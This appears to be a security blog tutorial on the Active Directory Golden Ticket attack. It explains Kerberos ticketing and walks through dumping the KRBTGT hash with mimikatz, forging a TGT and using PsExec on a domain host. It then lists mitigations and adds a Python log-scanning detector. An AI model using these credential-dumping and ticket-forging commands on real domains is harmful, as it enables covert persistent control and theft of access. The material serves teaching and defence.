This is not really a privilege escalation attack; it is more of a persistence attack. It applies once you already have access to something high level, such as a domain controller, and in this demo we use the administrator account. It is most useful after you have already compromised the domain, because it gives you an easy way to keep persistent access to it.
How KDC works
In an Active Directory domain, every domain controller runs a KDC (Key Distribution Center) service that handles every user request for TGT or TGS tickets. AD uses the key of the KRBTGT account in the domain to generate these tickets.
Step 1 - Legitimate User: requests a TGT (Ticket Granting Ticket), authenticating to the KDC with the user's NTLM hash
Step 2 - Domain Controller (KDC): returns the TGT, encrypted with the KRBTGT hash
Step 3 - Legitimate User: presents the TGT and requests a TGS (Ticket Granting Service ticket) for a particular server, in this case the application server
Step 4 - Domain Controller: returns the TGS for the application server
Now the user can authenticate to the application server with the TGS.
A TGT is built from: the domain name, the SID of the domain, the domain KRBTGT account NTLM password hash, and the user being impersonated.
What is Domain Persistence-Golden Ticket
Golden Tickets are forged Ticket-Granting Tickets (TGTs), also called authentication tickets. The attacker skips steps 1 and 2 and starts the communication with the KDC at step 3: since a Golden Ticket is a forged TGT, it is sent to the Domain Controller as part of the TGS-REQ to obtain a service ticket.
The TGT is mainly used to tell the KDC on a domain controller that another domain controller has already authenticated the user. In reality the TGT is encrypted with the KRBTGT password hash, and any KDC service inside the domain can decrypt it to prove that it is valid.
- In short, if we have a TGT we can request a TGS for any service. As shown above, a TGT is built with the KRBTGT account hash. If we have the hash of the KRBTGT account we can create a TGT ourselves with various tools and request a TGS for any server, which gives access to any resource or machine in the domain.
Attack Demonstration
The recipe for forging a TGT (also listed above):
Domain Name
SID of the Domain
Domain KRBTGT Account NTLM password hash
Impersonate user
In this attack we assume that the attacker has already compromised the DC (Domain Controller).
- Now we need the SID of the domain and the KRBTGT NTLM hash. For that we dump the hashes with mimikatz for the particular user, i.e. krbtgt
mimikatz#: lsadump::lsa /inject /user:krbtgt
KRBTGT NTLM HASH:
61bd28fa97db7369c913bee99d2aae89
SID OF THE DOMAIN:
crt\administrator S-1-5-21-1011749309-1128044670-722997229-500
You can also find the SID of the domain using
whoami /user
Forging TGT
Now we have all the credentials needed for this attack, so let's create the TGT using mimikatz
privilege::debug
mimikatz#: kerberos::golden /domain:crt.local /sid:S-1-5-21-1011749309-1128044670-722997229 /user:fake01 /krbtgt:61bd28fa97db7369c913bee99d2aae89 /id:500 /ptt
/user: any user name works here, even one that does not exist in the domain, or the Administrator account
/id: 500 is the RID of the built-in Administrator account, so the ticket impersonates that account
misc::cmd
- Now a new cmd window pops up with the ticket injected into its session. To check, type
klist
As you can see, the TGT has been created.
- Now you can use the PsExec tool to connect to any machine in the domain; we will try connecting to client01
.\PsExec.exe \\client01.crt.local cmd.exe
It is an awesome attack, but not everyone will pick it up quite yet: for example, if you already own the DC you could simply create a new account and make it a domain admin. If you want to be stealthier, have a look at the Silver Ticket Attack.
Mitigate Domain Persistence-Golden Ticket Attack
APPROACH 1: Reduce domain administrative rights. Review the membership of privileged domain groups (e.g. Domain Admins, Enterprise Admins, Server Operators) and remove unnecessary members.
APPROACH 2: Enforce user least privilege. Rely on a least-privilege model to restrict user and domain administrator access, and limit the number of administrator accounts.
APPROACH 3: Routinely reset the KRBTGT password twice. Changing the password twice ensures that any ticket signed with a stolen KDC key is invalidated. The DC stores two versions of the KRBTGT password (the current and the previous one), which lets the KDC check whether an invalid TGT carries a KDC key that matches the previous KRBTGT password. (Windows Event ID 4769 will notify you if a Golden Ticket is submitted to a DC after the KRBTGT password has been reset twice.)
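As an added detection-side example (not code from the original post), the Python below scans constructed log lines for the two traces a ticket forged with /user:fake01 /id:500, as in the demo above, leaves on the DC and the target: a 4769 for an account the directory does not know, and a 4624 logon whose SID RID does not belong to the account name it carries. The KNOWN_USERS snapshot, the key=value log format, the hostnames and the IP addresses are assumptions.

```python
"""Defender-side check for the traces a forged TGT leaves once it is used.

Added example (not the original post's code): scans constructed key=value
log lines for a 4769 for an account the directory does not know, and a
4624 logon whose SID RID does not belong to the account name it carries.
"""
import re

# Assumption: a directory snapshot mapping sAMAccountName -> RID.
KNOWN_USERS = {"administrator": 500, "krbtgt": 502, "alice": 1104}
# Domain SID taken from the walkthrough above.
DOMAIN_SID = "S-1-5-21-1011749309-1128044670-722997229"

# Constructed sample events; the hostnames and IPs are made up.
SAMPLE_LOG = """\
EventID=4769 TargetUserName=alice@CRT.LOCAL ServiceName=CLIENT01$ IpAddress=10.0.0.21
EventID=4769 TargetUserName=fake01@CRT.LOCAL ServiceName=CLIENT01$ IpAddress=10.0.0.50
EventID=4624 TargetUserName=alice TargetUserSid=S-1-5-21-1011749309-1128044670-722997229-1104 IpAddress=10.0.0.21
EventID=4624 TargetUserName=fake01 TargetUserSid=S-1-5-21-1011749309-1128044670-722997229-500 IpAddress=10.0.0.50
"""

def parse_line(line):
    """Turn 'key=value key=value' into a dict."""
    return dict(re.findall(r"(\w+)=(\S+)", line))

def check_event(ev):
    """Return the findings for one parsed event; an empty list means nothing odd."""
    findings = []
    name = ev.get("TargetUserName", "").split("@")[0].lower()
    if ev.get("EventID") == "4769" and name not in KNOWN_USERS:
        findings.append(f"4769: service ticket issued to nonexistent account '{name}'")
    if ev.get("EventID") == "4624":
        sid = ev.get("TargetUserSid", "")
        if not sid.startswith(DOMAIN_SID + "-"):
            findings.append(f"4624: SID {sid} is not from this domain")
        else:
            rid = int(sid.rsplit("-", 1)[1])
            if KNOWN_USERS.get(name) != rid:
                findings.append(f"4624: '{name}' logged on with RID {rid}, "
                                f"directory says RID {KNOWN_USERS.get(name)}")
    return findings

def scan(log_text):
    """Map each suspicious line number (1-based) to its findings."""
    results = {}
    for n, line in enumerate(log_text.splitlines(), 1):
        if found := check_event(parse_line(line)):
            results[n] = found
    return results
```

Feeding it real exports means mapping the event fields to the same keys; the name/RID comparison also catches a forged ticket that borrows an existing name with a different RID.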